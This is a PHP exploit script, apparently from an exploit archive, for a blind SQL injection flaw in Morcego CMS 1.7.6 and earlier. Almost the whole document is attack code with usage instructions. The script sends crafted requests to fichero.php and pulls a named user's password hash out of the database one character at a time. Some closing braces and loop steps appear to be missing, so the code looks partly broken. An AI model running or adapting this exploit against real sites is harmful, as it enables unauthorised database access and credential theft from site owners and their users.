Morcego CMS <= 1.7.6 Remote Blind SQL Injectio
Morcego CMS <= 1.7.6 Remote Blind SQL Injection Exploit
function usage () {
exit ( "\n".
"- -\n".
"+ Morcego CMS <= 1.7.6 Blind SQL Injection Exploit +\n".
"- Author : darkjoker -\n".
"- Download: +\n".
"+ Usage : php xpl.php <hostname> <path> <username> -\n".
"- Ex. : php xpl.php localhost /MorcegoCMS/ root +\n".
"+ -\n".
function hex ($string) {
while ($i<strlen($string))
$hex .= "%".dechex(ord($string[$i++]));
return $hex;
function check_chr ($hostname, $path, $pos, $char, $username) {
$char = ord ($char);
if (!($sp = fsockopen ($hostname, 80, $errno, $errstr, 5)))
die ("[-] Unknow hostname.");
$query = hex ("1' OR ASCII(SUBSTRING((SELECT password FROM morcego_users WHERE username='{$username}'),{$pos},1))={$char}-- ");
$request = "GET {$path}fichero.php?{$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
fputs ($sp, $request);
while (!feof ($sp))
$reply .= fgets ($sp, 1024);
fclose ($sp);
if (preg_match ("|Page not found|", $reply))
return false;
return true;
if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$username = $argv [3];
$array = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Password (hash): ";
for ($i=0,$d=1;$i<strlen($array);) {
if (check_chr ($hostname, $path, $d, $array [$i], $username)) {
echo $array [$i];
echo "\n";
# [2018-04-11] #
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